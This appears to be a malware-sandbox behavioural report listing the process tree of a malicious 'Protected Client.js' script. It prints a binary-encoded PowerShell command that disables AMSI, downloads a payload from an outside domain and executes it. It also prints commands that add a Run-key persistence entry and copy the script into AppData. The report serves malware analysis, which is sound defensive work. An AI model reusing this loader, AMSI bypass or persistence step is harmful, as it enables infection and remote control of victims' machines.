popup
| ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Behavioral Analysis

Process tree

  • wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\test22\AppData\Local\Temp\Protected Client.js"

    2232

    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $gf=(00100111,01011011,01110110,01101111,01101001,01100100,00100111,00100000,00101011,00100000,00100111,01011101,00100000,01011011,01010011,01111001,01110011,01110100,00100111,00100000,00101011,00100000,00100111,01100101,01101101,00101110,01010010,01100101,01100110,01101100,01100101,00100111,00100000,00101011,00100000,00100111,01100011,01110100,01101001,01101111,01101110,00101110,01000001,01110011,01110011,01100101,00100111,00100000,00101011,00100000,00100111,01101101,01100010,01101100,01111001,01011101,00111010,00111010,01001100,01101111,01100001,01100100,01010111,01101001,00100111,00100000,00101011,00100000,00100111,01110100,01101000,01010000,01100001,01110010,01110100,01101001,01100001,01101100,01001110,01100001,01101101,01100101,00101000,00100111,00100111,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00100111,00100111,00101001,00100111,01111100,01001001,01000101,01011000,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,00100100,01111001,01110010,01110100,01100111,00111101,01011011,01010010,01100101,01100110,01011101,00101110,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,00101110,01000111,01100101,01110100,01010100,01111001,01110000,01100101,00101000,00100111,01010011,01111001,00100111,00101011,00100111,01110011,01110100,01100101,01101101,00101110,00100111,00101011,00100111,01001101,01100001,01101110,01100001,00100111,00101011,00100111,01100111,01100101,01101101,00100111,00101011,00100111,01100101,01101110,01110100,00100111,00101011,00100111,00101110,01000001,01110101,01110100,01101111,01101101,00100111,00101011,00100111,01100001,01110100,01101001,01101111,00100111,00101011,00100111,01101110,00101110,01000001,00100111,00101011,00100111,01101101,00100111,00101011,00100111,01110011,01101001,00100111,00101011,00100111,01010101,01110100,01101001,01101100,01110011,00100111,00101001,00101110,01000111,01100101,01110100,01000110,01101001,01100101,01101100,01100100,00101000,00100111,01100001,00100111,00101011,00100111,01101101,01110011,00100111,00101011,00100111,01101001,01001001,00100111,00101011,00100111,01101110,01101001,01110100,01000110,01100001,00100111,00101011,00100111,01101001,01101100,01100101,01100100,00100111,00101100,00100111,01001110,01101111,01101110,00100101,01011110,00100111,00101110,01110010,01100101,01110000,01101100,01100001,01100011,01100101,00101000,00100111,00100101,01011110,00100111,00101100,00100111,01010000,01110101,01100010,00100111,00101001,00101011,00100111,01101100,01101001,01100011,00101100,01010011,00100111,00101011,00100111,01110100,01100001,01110100,01101001,01100011,00100111,00101001,00111011,00100100,01111001,01110010,01110100,01100111,00101110,01010011,01100101,01110100,01010110,01100001,01101100,01110101,01100101,00101000,00100100,01101110,01110101,01101100,01101100,00101100,00100100,01110100,01110010,01110101,01100101,00101001,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,00100111,00101011,00100111,01110100,00101110,01010111,01100101,00100111,00101011,00100111,01100010,01000011,01101100,01101001,00100111,00101011,00100111,01100101,01101110,01110100,00101001,00100111,01111100,01001001,01100000,01000101,01100000,01011000,00111011,00100100,01101101,01110110,00111101,00100000,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01001001,01101110,01110100,01100101,01110010,01100001,01100011,01110100,01101001,01101111,01101110,01011101,00111010,00111010,01000011,01100001,01101100,01101100,01000010,01111001,01101110,01100001,01101101,01100101,00101000,00100100,01110100,01110100,01111001,00101100,00100111,01000100,01101111,01110111,01101110,01101100,01101111,01100001,01100100,01010011,01110100,01110010,01101001,01101110,01100111,00100111,00101100,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01000011,01100001,01101100,01101100,01010100,01111001,01110000,01100101,01011101,00111010,00111010,01001101,01100101,01110100,01101000,01101111,01100100,00101100,00100111,01101000,01110100,01110100,01110000,00111010,00101111,00101111,01100100,01110010,01100101,01100001,01101101,01110111,01100001,01110100,01100011,01101000,01100101,01110110,01100101,01101110,01110100,00101110,01100011,01101111,01101101,00101111,00101110,01110111,01100101,01101100,01101100,00101101,01101011,01101110,01101111,01110111,01101110,00101111,01110000,01101011,01101001,00101101,01110110,01100001,01101100,01101001,01100100,01100001,01110100,01101001,01101111,01101110,00101111,01000001,01110100,01110100,01100001,01100011,01101011,00101110,01101010,01110000,01100111,00100111,00101001,00111011,00100100,01110010,00110111,00111000,01100110,01100100,00110000,00110000,00110000,01110011,01100100,00111101,00100000,00100100,01101101,01110110,00100000,00101101,01110011,01110000,01101100,01101001,01110100,00100000,00100111,00100101,00100111,00100000,01111100,01000110,01101111,01110010,01000101,01100001,01100011,01101000,00101101,01001111,01100010,01101010,01100101,01100011,01110100,00100000,01111011,01011011,01100011,01101000,01100001,01110010,01011101,01011011,01100010,01111001,01110100,01100101,01011101,00100010,00110000,01111000,00100100,01011111,00100010,01111101,00111011,00100100,01111001,00110101,01101010,01101000,00110110,00110010,01100100,01100110,00110000,00111101,00100000,01001001,01100000,01000101,01100000,01011000,00101000,00100100,01110010,00110111,00111000,01100110,01100100,00110000,00110000,00110000,01110011,01100100,00100000,00101101,01101010,01101111,01101001,01101110,00100000,00100111,00100111,00101001) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };I`E`X([system.String]::Join('', $gf))

      2860

    • cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "lol" /t REG_SZ /F /D "C:\Users\test22\AppData\Roaming\Protected Client.js"

      2200

    • cmd.exe "C:\Windows\System32\cmd.exe" /c copy "C:\Users\test22\AppData\Local\Temp\Protected Client.js" "C:\Users\test22\AppData\Roaming\" /Y

      776

Process contents

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID
default registry file network process services synchronisation iexplore office pdf